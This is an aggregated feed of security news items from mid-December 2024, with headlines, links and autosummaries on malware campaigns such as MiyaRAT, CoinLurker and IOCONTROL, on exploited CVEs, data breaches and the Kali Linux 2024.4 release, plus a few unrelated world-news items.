    Autosummary: "The operation exploited a suspected zero-day vulnerability, enabling attackers to infiltrate networks, steal credentials, and deploy ransomware," the company said, adding the campaign "involved three distinct threat actors – Monstrous Mantis (Ragnar Locker), Ruthless Mantis (PTI-288) and LARVA-15 (Wazawaka) – who followed a structured and efficient workflow. "


    Kali Linux 2024.4 released! 14 new shiny tools added

    Linux
    2024-12-17 https://www.helpnetsecurity.com/2024/12/17/kali-linux-2024-4-released/

    Kali Linux 2024.4 includes a broad set of updates and changes. The summary of the changelog since the 2024.3 release from September: Python 3.12 – New default Python version (Au revoir pip, hello pipx). The end of the i386 kernel and images – Farewell x86 (images), but not goodbye (packages). Deprecations in the SSH client: DSA keys – Reminder about using ssh1 if required. Raspberry Pi Imager customizations support: Able to alter settings at write … More

    The post Kali Linux 2024.4 released! 14 new shiny tools added appeared first on Help Net Security.

    "

    Autosummary: New Tools in Kali: bloodyad – Active Directory privilege escalation framework; certi – Ask for certificates to ADCS and discover templates; chainsaw – Search and hunt through Windows forensic artefacts; findomain – Complete solution for domain recognition; linkedin2username – Generate username lists for companies on LinkedIn; mssqlpwner – Interact and pwn MSSQL servers; openssh-ssh1 – SSH client for legacy SSH1 protocol; proximoth – Control frame attack vulnerability detection tool; python-pipx – Execute binaries from Python packages in isolated environments; sara – RouterOS Security Inspector; web-cache-vulnerability-scanner – Go-based CLI tool for testing for web cache poisoning; xsrfprobe – Advanced CSRF/XSRF audit and exploitation toolkit. "


    Bitter APT Targets Turkish Defense Sector with WmRAT and MiyaRAT Malware

    exploits
    2024-12-17 https://thehackernews.com/2024/12/bitter-apt-targets-turkish-defense.html
    A suspected South Asian cyber espionage threat group known as Bitter targeted a Turkish defense sector organization in November 2024 to deliver two C++-malware families tracked as WmRAT and MiyaRAT. "The attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads," Proofpoint "

    Autosummary: Both WmRAT and MiyaRAT, as previously detailed by QiAnXin, come with standard remote access trojan (RAT) capabilities, allowing the malware to collect host information, upload or download files, take screenshots, get geolocation data, enumerate files and directories, and run arbitrary commands via cmd.exe or PowerShell. "


    Hackers Exploit Webview2 to Deploy CoinLurker Malware and Evade Security Detection

    exploits
    2024-12-17 https://thehackernews.com/2024/12/hackers-exploit-webview2-to-deploy.html
    Bogus software update lures are being used by threat actors to deliver a new stealer malware called CoinLurker. "Written in Go, CoinLurker employs cutting-edge obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyber attacks," Morphisec researcher Nadav Lorber said in a technical report published Monday. The attacks make use of fake update alerts that employ "

    Autosummary: CoinLurker, once launched, initiates communications with a remote server using a socket-based approach and proceeds to harvest data from specific directories associated with cryptocurrency wallets (namely, Bitcoin, Ethereum, Ledger Live, and Exodus), Telegram, Discord, and FileZilla. "


    U.S. CISA adds Microsoft Windows Kernel-Mode Driver and Adobe ColdFusion flaws to its Known Exploited Vulnerabilities catalog

    exploits Linux
    2024-12-17 https://securityaffairs.com/172059/security/u-s-cisa-adds-microsoft-windows-kernel-mode-driver-and-adobe-coldfusion-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Windows Kernel-Mode Driver and Adobe ColdFusion flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Microsoft Windows Kernel-Mode Driver Untrusted Pointer Dereference (CVE-2024-35250) and Adobe ColdFusion Improper Access Control (CVE-2024-20767) vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The […] "

    Autosummary: "


    Ireland fines Meta $264 million over 2018 Facebook data breach

    financial
    2024-12-17 https://www.bleepingcomputer.com/news/security/ireland-fines-meta-264-million-over-2018-facebook-data-breach/
    The Irish Data Protection Commission (DPC) fined Meta €251 million ($263.6M) over General Data Protection Regulation (GDPR) violations arising from a 2018 personal data breach impacting 29 million Facebook accounts. [...] "

    Autosummary: Specifically, the Irish DPC says the following GDPR violations are related to the incident: Article 33(3): incomplete breach notification details → €8M fine; Article 33(5): poor documentation of breach facts/remedies → €3M fine; Article 25(1): "


    Researchers reveal OT-specific malware in use and in development

    exploits
    2024-12-17 https://www.helpnetsecurity.com/2024/12/17/ot-specific-malware-siemens-industrial-iot/

    Malware that’s made specifically to target industrial control systems (ICS), Internet of Things (IoT) and operational technology (OT) control devices is still rare, but in the last few weeks security researchers have identified two salient threats based on samples uploaded to VirusTotal: Claroty’s Team82 researchers have unearthed IOCONTROL, a piece of malware that appears to be generic enough to run on a variety of platforms and devices from different vendors. Forescout’s Vedere Labs researchers have … More

    The post Researchers reveal OT-specific malware in use and in development appeared first on Help Net Security.

    "

    Autosummary: The malware can apparently run on routers, programmable logic controllers (PLCs), human-machine interfaces (HMIs), firewalls, and other Linux-based IoT/OT platforms, manufactured by Baicells, D-Link, Hikvision, Red Lion, Orpak, Phoenix Contact, Teltonika, Unitronics, and other vendors. "


    Los Zetas cartel boss re-arrested in Mexico after US jail time

    latam
    2024-12-17 https://www.bbc.com/news/articles/c99xmp73ello
    Osiel Cárdenas Guillén founded the feared group of brutal cartel hitmen known as Los Zetas. "

    Autosummary: Osiel Cárdenas Guillén was quickly re-arrested on his return to Mexico. US immigration officials handed Cárdenas over to Mexican police at the Otay border crossing, where he was quickly re-arrested and taken to El Altiplano maximum security jail in Mexico state. "


    New critical Apache Struts flaw exploited to find vulnerable servers

    exploits
    2024-12-17 https://www.bleepingcomputer.com/news/security/new-critical-apache-struts-flaw-exploited-to-find-vulnerable-servers/
    A recently patched critical Apache Struts 2 vulnerability tracked as CVE-2024-53677 is actively exploited using public proof-of-concept exploits to find vulnerable devices. [...] "

    Autosummary: Apache publicly disclosed the Struts CVE-2024-53677 flaw (CVSS 4.0 score: 9.5, "critical") six days ago, stating it is a bug in the software's file upload logic, allowing path traversals and the uploading of malicious files that could lead to remote code execution. "


    Attackers Exploit Microsoft Teams and AnyDesk to Deploy DarkGate Malware

    exploits
    2024-12-17 https://thehackernews.com/2024/12/attackers-exploit-microsoft-teams-and.html
    A new social engineering campaign has leveraged Microsoft Teams as a way to facilitate the deployment of a known malware called DarkGate. "An attacker used social engineering via a Microsoft Teams call to impersonate a user's client and gain remote access to their system," Trend Micro researchers Catherine Loveria, Jovit Samaniego, and Gabriel Nicoleta said. "The attacker failed to install a "

    Autosummary: "By monitoring key metrics like domain registrations, textual patterns, DNS anomalies and change request trends, security teams can identify and mitigate threats early." "


    "Bitter" cyberspies target defense orgs with new MiyaRAT malware

    exploits
    2024-12-17 https://www.bleepingcomputer.com/news/security/bitter-cyberspies-target-defense-orgs-with-new-miyarat-malware/
    A cyberespionage threat group known as "Bitter" was observed targeting defense organizations in Turkey using a novel malware family named MiyaRAT. [...] "

    Autosummary: Both malware families are C++ remote access trojans (RATs) that provide Bitter with data exfiltration, remote control, screenshot capturing, command execution (CMD or PowerShell), and system monitoring capabilities. "


    New fake Ledger data breach emails try to steal crypto wallets

    financial
    2024-12-17 https://www.bleepingcomputer.com/news/security/new-fake-ledger-data-breach-emails-try-to-steal-crypto-wallets/
    A new Ledger phishing campaign is underway that pretends to be a data breach notification asking you to verify your recovery phrase, which is then stolen and used to steal your cryptocurrency. [...] "

    Autosummary: Clicking the "Verify My Recovery Phrase" button brings you to an Amazon AWS website at "https://product-ledg.s3.us-west-1.amazonaws[.]com/recover.html" that then redirects users to a phishing page at "ledger-recovery[.]info". Clicking the "Verify your Ledger now" button brings up another page asking you to enter your 12, 18, or 24-word Ledger recovery phrase. "


    Texas Tech University data breach impacted 1.4 million individuals

    financial
    2024-12-17 https://securityaffairs.com/172085/data-breach/texas-tech-university-data-breach.html
    Texas Tech University reports a data breach affecting 1.4 million, exposing personal, health, and financial data from its health sciences centers. Texas Tech University disclosed a data breach that impacted over 1.4 million individuals following a cyber attack. The security breach exposed the personal, health, and financial data from its health sciences centers, the Health […] "

    Autosummary: "


    Malicious ad distributes SocGholish malware to Kaiser Permanente employees

    exploits
    2024-12-16 https://www.malwarebytes.com/blog/cybercrime/2024/12/malicious-ad-distributes-socgholish-malware-to-kaiser-permanente-employees
    A fraudulent Google ad meant to phish employees for their login credentials redirects them to a fake browser update page instead. "

    Autosummary: We can see what their website looked like in 2021, using the Internet Archive. Some time more recently, this same website was taken over by criminals who transformed it into a phishing page for Kaiser Permanente. Malicious redirect to SocGholish: it looks like there was more than one cook in the kitchen, as malicious code was also injected in the core JavaScript libraries for that website, confirmed in a scan by Sucuri’s SiteCheck. When potential victims clicked on the ad, they landed on that compromised website, which in turn briefly displayed the phishing template only for as long as a mouse scroll or click. Then, a new screen appeared with what looks like a Google Chrome notification claiming the user’s browser is out of date. This screen, also known as SocGholish, is a long-running malware campaign that targets vulnerable websites indiscriminately. "


    With DORA approaching, financial institutions must strengthen their cyber resilience

    financial
    2024-12-16 https://www.helpnetsecurity.com/2024/12/16/financial-institutions-dora-requirements/

    The clock is ticking for financial institutions across the EU as the January 17, 2025, deadline for the Digital Operational Resilience Act (DORA) approaches. This regulation will reshape how organizations in the financial sector approach cybersecurity and operational resilience. It demands more than just technical upgrades — it calls for a strategic shift in mindset and practices.

    The post With DORA approaching, financial institutions must strengthen their cyber resilience appeared first on Help Net Security.

    "

    Autosummary: To meet DORA’s standards, organizations must strengthen their operations across five critical areas: ICT risk management, incident reporting, resilience testing, third-party risk management, and information sharing. For DORA compliance, institutions must ensure their testing is comprehensive, encompassing internal systems, third-party integrations and the latest threat intelligence. "


    Overlooking platform security weakens long-term cybersecurity posture

    ciber
    2024-12-16 https://www.helpnetsecurity.com/2024/12/16/platform-security-concerns/

    Platform security – securing the hardware and firmware of PCs, laptops and printers – is often overlooked, weakening cybersecurity posture for years to come, according to HP. The report, based on a global study of 800+ IT and security decision-makers (ITSDMs) and 6000+ work-from-anywhere (WFA) employees, shows that platform security is a growing concern with 81% of ITSDMs agreeing that hardware and firmware security must become a priority to ensure attackers cannot exploit vulnerable devices. … More

    The post Overlooking platform security weakens long-term cybersecurity posture appeared first on Help Net Security.

    "

    Autosummary: “The prioritization, or lack thereof, of hardware and firmware security requirements during procurement can have ramifications across the entire lifetime of a fleet of devices – from increased risk exposure, to driving up costs or negative user experience – if security and manageability requirements are set too low compared to the available state of the art,” warns Boris Balacheff, Chief Technologist for Security Research and Innovation at HP Inc. “It’s essential that end-user device infrastructures become resilient to cyber risks.” Five stages of the device lifecycle – supplier selection: 34% say a PC, laptop or printer supplier has failed a cybersecurity audit in the last five years, with 18% saying the failure was so serious that they terminated their contract. "


    New Investment Scam Leverages AI, Social Media Ads to Target Victims Worldwide

    financial
    2024-12-16 https://thehackernews.com/2024/12/new-investment-scam-leverages-ai-social.html
    Cybersecurity researchers are calling attention to a new kind of investment scam that leverages a combination of social media malvertising, company-branded posts, and artificial intelligence (AI) powered video testimonials featuring famous personalities, ultimately leading to financial and data loss. "The main goal of the fraudsters is to lead victims to phishing websites and forms that harvest "

    Autosummary: Similar to major scam operations like Telekopye, it's suspected that there are different groups who are in charge of managing each and every aspect of the attack chain: theft, creation, and abuse of Meta accounts and ads, building the phishing infrastructure, and running the call centers. "


    New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP

    exploits
    2024-12-16 https://thehackernews.com/2024/12/new-glutton-malware-exploits-popular.html
    Cybersecurity researchers have discovered a new PHP-based backdoor called Glutton that has been put to use in cyber attacks targeting China, the United States, Cambodia, Pakistan, and South Africa. QiAnXin XLab, which discovered the malicious activity in late April 2024, attributed the previously unknown malware with moderate confidence to the prolific Chinese nation-state group tracked as Winnti ( "

    Autosummary: The primary module that enables the attack is "task_loader," which is used to assess the execution environment and fetch additional components, including "init_task," which is responsible for downloading an ELF-based backdoor that masquerades as the FastCGI Process Manager ("/lib/php-fpm"), infecting PHP files with malicious code for further payload execution, and collecting sensitive information and modifying system files. "


    Ukrainian Minors Recruited for Cyber Ops and Reconnaissance in Russian Airstrikes

    rusia-ucrania
    2024-12-16 https://thehackernews.com/2024/12/ukrainian-minors-recruited-for-cyber.html
    The Security Service of Ukraine (SBU or SSU) has exposed a novel espionage campaign suspected to be orchestrated by Russia's Federal Security Service (FSB) that involves recruiting Ukrainian minors for criminal activities under the guise of "quest games." Law enforcement officials said that they detained two FSB agent groups following a special operation in Kharkiv. These groups, per the agency, "

    Autosummary: "


    New Android NoviSpy spyware linked to Qualcomm zero-day bugs

    exploits
    2024-12-16 https://www.bleepingcomputer.com/news/security/new-android-novispy-spyware-linked-to-qualcomm-zero-day-bugs/
    The Serbian government exploited Qualcomm zero-days to unlock and infect Android devices with a new spyware named "NoviSpy," used to spy on activists, journalists, and protestors. [...] "

    Autosummary: Subsequently, the researchers provided Google's Threat Analysis Group (TAG) with exploit artifacts, leading to uncovering the flaws in Qualcomm's DSP (Digital Signal Processor) driver ("adsprpc"), which is used for offloading multimedia processing to the DSP core. "In February 2024, Slaviša Milanov, an independent journalist from Dimitrovgrad in Serbia who covers local interest news stories, was brought into a police station after a seemingly routine traffic stop," reads a report by Amnesty International. "


    ⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips

    ciber
    2024-12-16 https://thehackernews.com/2024/12/thn-recap-top-cybersecurity-threats_16.html
    This past week has been packed with unsettling developments in the world of cybersecurity. From silent but serious attacks on popular business tools to unexpected flaws lurking in everyday devices, there’s a lot that might have flown under your radar. Attackers are adapting old tricks, uncovering new ones, and targeting systems both large and small. Meanwhile, law enforcement has scored wins "

    Autosummary: The list includes CVE-2024-11639 (Ivanti CSA), CVE-2024-49138 (Windows CLFS Driver), CVE-2024-44131 (Apple macOS), CVE-2024-54143 (OpenWrt), CVE-2024-11972 (Hunk Companion plugin), CVE-2024-11205 (WPForms), CVE-2024-12254 (Python), CVE-2024-53677 (Apache Struts), CVE-2024-23474 (SolarWinds Access Rights Manager), CVE-2024-43153, CVE-2024-43234 (Woffice theme), CVE-2024-43222 (Sweet Date theme), JS Help Desk (JS Help Desk plugin), CVE-2024-54292 (Appsplate plugin), CVE-2024-47578 (Adobe Document Service), CVE-2024-54032 (Adobe Connect), CVE-2024-53552 (CrushFTP), CVE-2024-55884 (Mullvad VPN), and CVE-2024-28025, CVE-2024-28026, CVE-2024-28027, CVE-2024-21786 (MC Technologies MC-LR Router), CVE-2024-21855, CVE-2024-28892, and CVE-2024-29224 (GoCast). IOCONTROL has been used to attack IoT and SCADA devices of various types including IP cameras, routers, PLCs, HMIs, firewalls, and more from different vendors such as Baicells, D-Link, Hikvision, Red Lion, Orpak, Phoenix Contact, Teltonika, and Unitronics. BadRAM Relies on $10 Equipment to Break AMD Security: Academic researchers from KU Leuven, the University of Lübeck, and the University of Birmingham have devised a new technique called BadRAM (CVE-2024-21944, CVSS score: 5.3) that employs $10 off-the-shelf equipment combining a Raspberry Pi Pico, a DDR socket, and a 9V source to breach AMD's Secure Encrypted Virtualization (SEV) guarantees. "These attacks are characterized by a sudden and significant increase in authentication attempts and failures, which trigger alerts across monitoring systems, including Gateway Insights and Active Directory logs," the company said, adding they could result in excessive logging, management CPU overload, and appliance instability. "BadRAM completely undermines trust in AMD's latest Secure Encrypted Virtualization (SEV-SNP) technology, which is widely deployed by major cloud providers, including Amazon AWS, Google Cloud, and Microsoft Azure," security researcher Jo Van Bulck told The Hacker News. "


    Windows kernel bug now exploited in attacks to gain SYSTEM privileges

    exploits Linux
    2024-12-16 https://www.bleepingcomputer.com/news/security/windows-kernel-bug-now-exploited-in-attacks-to-gain-system-privileges/
    CISA has warned U.S. federal agencies to secure their systems against ongoing attacks targeting a high-severity Windows kernel vulnerability. [...] "

    Autosummary: Tracked as CVE-2024-35250, this security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don't require user interaction. "


    Rhode Island confirms data breach after Brain Cipher ransomware attack

    financial exploits ransomware
    2024-12-16 https://www.bleepingcomputer.com/news/security/rhode-island-confirms-data-breach-after-brain-cipher-ransomware-attack/
    Rhode Island is warning that its RIBridges system, managed by Deloitte, suffered a data breach exposing residents' personal information after the Brain Cipher ransomware gang hacked its systems. [...] "

    Autosummary: "On December 13, 2024, the State was informed by its vendor, Deloitte, that there was a major security threat to the RIBridges system," reads the announcement published by the Rhode Island authorities on Saturday. "


    Task scams surge by 400%, but what are they?

    financial
    2024-12-16 https://www.malwarebytes.com/blog/news/2024/12/task-scams-surge-by-400-but-what-are-they
    Task scams are a new type of scam in which victims are slowly tricked into paying in order to get paid for simple, repetitive tasks. "

    Autosummary: In these scams, online criminals prey on people looking for remote jobs by offering them simple repetitive tasks such as liking videos, optimizing apps, boosting product interest, or rating product images. "


    Serbian government used Cellebrite to unlock phones, install spyware

    government
    2024-12-16 https://www.helpnetsecurity.com/2024/12/16/serbian-government-used-cellebrite-to-unlock-phones-install-spyware/

    Serbian police and intelligence officers used Cellebrite forensic extraction software to unlock journalists’ and activists’ phones and install previously unknown Android spyware called NoviSpy, a new Amnesty International report claims. The unlocking was made possible through exploitation of a zero-day vulnerability affecting chipsets made by Qualcomm. In early October 2024, Qualcomm fixed CVE-2024-43047, reported by Google’s Threat Analysis Group (TAG) and Amnesty International as exploited in the wild. Google followed with a fix for Android … More

    The post Serbian government used Cellebrite to unlock phones, install spyware appeared first on Help Net Security.

    "

    Autosummary: The spyware communicates with servers hosted in Serbia, some on an IP address range associated with the BIA, and configuration data embedded in one spyware sample “ties back to a specific BIA employee, who was previously linked to Serbia’s efforts to procure Android spyware from the now defunct spyware vendor, Hacking Team.” "


    FBI spots HiatusRAT malware attacks targeting web cameras, DVRs

    exploits
    2024-12-16 https://www.bleepingcomputer.com/news/security/fbi-spots-hiatusrat-malware-attacks-targeting-web-cameras-dvrs/
    The FBI warned today that new HiatusRAT malware attacks are now scanning for and infecting vulnerable web cameras and DVRs that are exposed online. [...] "

    Autosummary: "


    Texas Tech University System data breach impacts 1.4 million patients

    financial
    2024-12-16 https://www.bleepingcomputer.com/news/security/texas-tech-university-system-data-breach-impacts-14-million-patients/
    The Texas Tech University Health Sciences Center and its El Paso counterpart suffered a cyberattack that disrupted computer systems and applications, potentially exposing the data of 1.4 million patients. [...] "

    Autosummary: "


    Kali Linux 2024.4 released with 14 new tools, deprecates some features

    Linux
    2024-12-16 https://www.bleepingcomputer.com/news/security/kali-linux-20244-released-with-14-new-tools-deprecates-some-features/
    Kali Linux has released version 2024.4, the fourth and final version of 2024, and it is now available with fourteen new tools, numerous improvements, and deprecates some features. [...] "

    Autosummary: The fourteen new tools in this release are: bloodyad - Active Directory privilege escalation framework (submitted by @Arszilla); certi - Ask for certificates to ADCS and discover templates (submitted by @Arszilla); chainsaw - Rapidly search and hunt through Windows forensic artefacts (submitted by @Arszilla); findomain - Fastest and most complete solution for domain recognition (submitted by @Arszilla); hexwalk - Hex analyzer, editor and viewer; linkedin2username - Generate username lists for companies on LinkedIn; mssqlpwner - Interact and pwn MSSQL servers; openssh-ssh1 - Secure SHell (SSH) client for the legacy SSH1 protocol; proximoth - Control frame attack vulnerability detection tool (submitted by @TechnicalUserX); python-pipx - Execute binaries from Python packages in isolated environments; sara - RouterOS Security Inspector (submitted by @casterbyte); web-cache-vulnerability-scanner - Go-based CLI tool for testing for web cache poisoning (submitted by @Arszilla); xsrfprobe - An advanced Cross Site Request Forgery (CSRF/XSRF) audit and exploitation toolkit. To start using Kali Linux 2024.4, you can upgrade your existing installation, select a platform, or directly download ISO images for new installs and live distributions. Once done upgrading, you can check if the upgrade was successful by using the following command: grep VERSION /etc/os-release. You can view the complete changelog for Kali 2024.4 on Kali's website. "


    ConnectOnCall data breach impacted over 900,000 individuals

    financial
    2024-12-16 https://securityaffairs.com/172053/data-breach/connectoncall-data-breach-impacted-over-900000-individuals.html
    ConnectOnCall disclosed a data breach impacting over 900,000 individuals, exposing their personal information. ConnectOnCall is a telehealth platform and after-hours on-call answering service designed to enhance communication between healthcare providers and patients. It offers automated patient call tracking, HIPAA-compliant chat, and integrates with electronic health record (EHR) systems to streamline after-hours calls and care coordination. […] "

    Autosummary: "


    Clop ransomware claims responsibility for Cleo data theft attacks

    exploits ransomware
    2024-12-15 https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-responsibility-for-cleo-data-theft-attacks/
    The Clop ransomware gang has confirmed to BleepingComputer that they are behind the recent Cleo data-theft attacks, utilizing zero-day exploits to breach corporate networks and steal data. [...] "

    Autosummary: If the data is government services, institutions, medicine, then we will immediately delete this data without hesitation (let me remind you about the last time when it was with moveit - all government data, medicine, clinics, data of scientific research at the state level were deleted), we comply with our regulations. "


    Week in review: Microsoft fixes exploited 0-day, top cybersecurity books for your holiday gift list

    exploits ciber
    2024-12-15 https://www.helpnetsecurity.com/2024/12/15/week-in-review-microsoft-fixes-exploited-0-day-top-cybersecurity-books-for-your-holiday-gift-list/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes exploited zero-day (CVE-2024-49138) On December 2024 Patch Tuesday, Microsoft resolved 71 vulnerabilities in a variety of its products, including a zero-day (CVE-2024-49138) that’s been exploited by attackers in the wild to execute code with higher privileges. Top cybersecurity books for your holiday gift list The holiday season is approaching, and with it, the tradition of gift-giving. For professionals … More

    The post Week in review: Microsoft fixes exploited 0-day, top cybersecurity books for your holiday gift list appeared first on Help Net Security.

    "

    Autosummary: New infosec products of the week: December 13, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Cato Networks, Horizon3.ai, SecureAuth, Stamus Networks, Trellix, and Versa Networks. Strengthening security posture with comprehensive cybersecurity assessments In this Help Net Security interview, Phani Dasari, CISO at HGS, discusses key aspects of cybersecurity assessments, including effective tools and methodologies, the role of AI and automation, and strategies for aligning assessments with organizational needs. "


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 24

    exploits
    2024-12-15 https://securityaffairs.com/172002/malware/security-affairs-malware-newsletter-round-24.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. PROXY.AM Powered by Socks5Systemz Botnet; AppLite: A New AntiDot Variant Targeting Mobile Employee Devices; Inside Zloader’s Latest Trick: DNS Tunneling; BSI points out pre-installed malware on IoT devices; Declawing PUMAKIT; Image-Based Malware Classification Using QR and […] "

    Autosummary: "


    Brazil's Lula says he's well after brain bleed surgery

    latam
    2024-12-15 https://www.bbc.com/news/articles/c4gxd7qglz6o
    The 79-year-old says "I am here, alive, whole" after emergency surgery this week. "

    Autosummary: "


    Germany Disrupts BADBOX Malware on 30,000 Devices Using Sinkhole Action

    exploits
    2024-12-14 https://thehackernews.com/2024/12/germany-disrupts-badbox-malware-on.html
    Germany's Federal Office of Information Security (BSI) has announced that it has disrupted a malware operation called BADBOX that came preloaded on at least 30,000 internet-connected devices sold across the country. In a statement published earlier this week, authorities said they severed the communications between the devices and their command-and-control (C2) servers by sinkholing the domains "

    Autosummary: "


    U.S. CISA adds Cleo Harmony, VLTrader, and LexiCom flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2024-12-14 https://securityaffairs.com/171973/security/u-s-cisa-adds-cleo-harmony-vltrader-and-lexicom-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cleo Harmony, VLTrader, and LexiCom flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability CVE-2024-50623 (CVSS score 8.8), which impacts multiple Cleo products, to its Known Exploited Vulnerabilities (KEV) catalog. “Cleo has identified an unrestricted file upload and download vulnerability (CVE-2024-50623) […] "

    Autosummary: By Pierluigi Paganini, December 14, 2024. "


    New Linux Rootkit PUMAKIT Uses Advanced Stealth Techniques to Evade Detection

    Linux
    2024-12-13 https://thehackernews.com/2024/12/new-linux-rootkit-pumakit-uses-advanced.html
    Cybersecurity researchers have uncovered a new Linux rootkit called PUMAKIT that comes with capabilities to escalate privileges, hide files and directories, and conceal itself from system tools, while simultaneously evading detection. "PUMAKIT is a sophisticated loadable kernel module (LKM) rootkit that employs advanced stealth mechanisms to hide its presence and maintain communication with "

    Autosummary: "


    Germany sinkholes BadBox malware pre-loaded on Android devices

    exploits
    2024-12-13 https://www.bleepingcomputer.com/news/security/germany-sinkholes-badbox-malware-pre-loaded-on-android-devices/
    Germany's Federal Office for Information Security (BSI) has disrupted the BadBox malware operation pre-loaded in over 30,000 Android IoT devices sold in the country. [...] "

    Autosummary: This may include smartphones and tablets, smart speakers, security cameras, smart TVs, streaming boxes, and various internet-connected appliances that follow an obscure route from manufacturing to resell networks. "


    FTC warns of online task job scams hooking victims like gambling

    financial
    2024-12-13 https://www.bleepingcomputer.com/news/security/ftc-warns-of-online-task-job-scams-hooking-victims-like-gambling/
    The Federal Trade Commission (FTC) warns about a significant rise in gambling-like online job scams, known as "task scams," that draw people into earning cash through repetitive tasks, with the promises of earning more if they deposit their own money. [...] "

    Autosummary: These scams impersonate legitimate companies, such as Deloitte, Amazon, McKinsey and Company, and Airbnb, and the victims are given tasks in sets, usually of forty items. "


    Russian cyberspies target Android users with new spyware

    rusia-ucrania
    2024-12-13 https://www.bleepingcomputer.com/news/security/russian-gamaredon-cyberspies-target-android-users-with-new-spyware/
    Russian cyberspies Gamaredon have been discovered using two Android spyware families named "BoneSpy" and "PlainGnome" to spy on and steal data from mobile devices. [...] "

    Autosummary: Lookout says development work on BoneSpy peaked between January and October 2022, stabilizing to the following capabilities: collects SMS messages, including sender, content, and timestamps; records ambient audio and phone call conversations; captures GPS and cell-based location data; takes pictures using the camera and captures device screenshots; accesses the user's web browsing history; extracts names, numbers, emails, and call details from the contact list and call logs; accesses clipboard content; reads device notifications. PlainGnome is a newer, custom Android surveillance malware that does not use the codebase of a previously known project. "


    Germany blocks BadBox malware loaded on 30,000 Android devices

    exploits
    2024-12-13 https://www.bleepingcomputer.com/news/security/germany-blocks-badbox-malware-loaded-on-30-000-android-devices/
    Germany's Federal Office for Information Security (BSI) has disrupted the BadBox malware operation pre-loaded in over 30,000 Android IoT devices sold in the country. [...] "

    Autosummary: This may include smartphones and tablets, smart speakers, security cameras, smart TVs, streaming boxes, and various internet-connected appliances that follow an obscure route from manufacturing to resell networks. "


    390,000+ WordPress Credentials Stolen via Malicious GitHub Repository Hosting PoC Exploits

    exploits
    2024-12-13 https://thehackernews.com/2024/12/390000-wordpress-credentials-stolen-via.html
    A now-removed GitHub repository that advertised a WordPress tool to publish posts to the online content management system (CMS) is estimated to have enabled the exfiltration of over 390,000 credentials. The malicious activity is part of a broader attack campaign undertaken by a threat actor, dubbed MUT-1244 (where MUT refers to "mysterious unattributed threat") by Datadog Security Labs, that "

    Autosummary: But in an interesting twist, the second-stage malware is delivered in four different ways: a backdoored configure compilation file; a malicious payload embedded in a PDF file; a Python dropper; and inclusion of a malicious npm package, "0xengine/meow". "MUT-1244 was able to compromise the system of dozens of victims, mostly red teamers, security researchers, and anyone with an interest in downloading PoC exploit code," the researchers said. "


    Critical OpenWrt Vulnerability Exposes Devices to Malicious Firmware Injection

    exploits
    2024-12-13 https://thehackernews.com/2024/12/critical-openwrt-vulnerability-exposes.html
    A security flaw has been disclosed in OpenWrt's Attended Sysupgrade (ASU) feature that, if successfully exploited, could have been abused to distribute malicious firmware packages. The vulnerability, tracked as CVE-2024-54143, carries a CVSS score of 9.3 out of a maximum of 10, indicating critical severity. Flatt Security researcher RyotaK has been credited with discovering and reporting the "

    Autosummary: "


    Iran-Linked IOCONTROL Malware Targets SCADA and Linux-Based IoT Platforms

    exploits industry Linux
    2024-12-13 https://thehackernews.com/2024/12/iran-linked-iocontrol-malware-targets.html
    Iran-affiliated threat actors have been linked to a new custom malware that"s geared toward IoT and operational technology (OT) environments in Israel and the United States. The malware has been codenamed IOCONTROL by OT cybersecurity company Claroty, highlighting its ability to attack IoT and supervisory control and data acquisition (SCADA) devices such as IP cameras, routers, programmable "

    Autosummary: The development makes IOCONTROL the tenth malware family to specifically single out Industrial Control Systems (ICS) after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, PIPEDREAM (aka INCONTROLLER), COSMICENERGY, and FrostyGoop (aka BUSTLEBERM) to date.


    Auto parts giant LKQ says cyberattack disrupted Canadian business unit

    ciber
    2024-12-13 https://www.bleepingcomputer.com/news/security/auto-parts-giant-lkq-says-cyberattack-disrupted-canadian-business-unit/
    Automobile parts giant LKQ Corporation disclosed that one of its business units in Canada was hacked, allowing threat actors to steal data from the company. [...]



    CISA confirms critical Cleo bug exploitation in ransomware attacks

    exploits ransomware
    2024-12-13 https://www.bleepingcomputer.com/news/security/cisa-confirms-critical-cleo-bug-exploitation-in-ransomware-attacks/
    CISA confirmed today that a critical remote code execution bug in Cleo Harmony, VLTrader, and LexiCom file transfer software is being exploited in ransomware attacks. [...]

    Autosummary: While the cybersecurity agency didn't provide any other information regarding the ransomware campaign targeting Cleo servers left vulnerable to CVE-2024-50623 exploits, these attacks are uncannily similar to previous Clop data theft attacks that exploited zero-days in MOVEit Transfer, GoAnywhere MFT, and Accellion FTA in recent years.


    Russian cyberspies target Android users with new spyware

    rusia-ucrania
    2024-12-13 https://www.bleepingcomputer.com/news/security/russian-cyberspies-target-android-users-with-new-spyware/
    The Russian cyberespionage group Gamaredon has been discovered using two Android spyware families, named "BoneSpy" and "PlainGnome", to spy on and steal data from mobile devices. [...]

    Autosummary: [Image: the spyware impersonating the Samsung Knox Manager (Source: BleepingComputer)] Lookout says development work on BoneSpy peaked between January and October 2022, stabilizing to the following capabilities: collecting SMS messages, including sender, content, and timestamps; recording ambient audio and phone call conversations; capturing GPS and cell-based location data; taking pictures using the camera and capturing device screenshots; accessing the user's web browsing history; extracting names, numbers, emails, and call details from the contact list and call logs; accessing clipboard content; and reading device notifications. PlainGnome is a newer, custom Android surveillance malware that does not use the codebase of a previously known project.


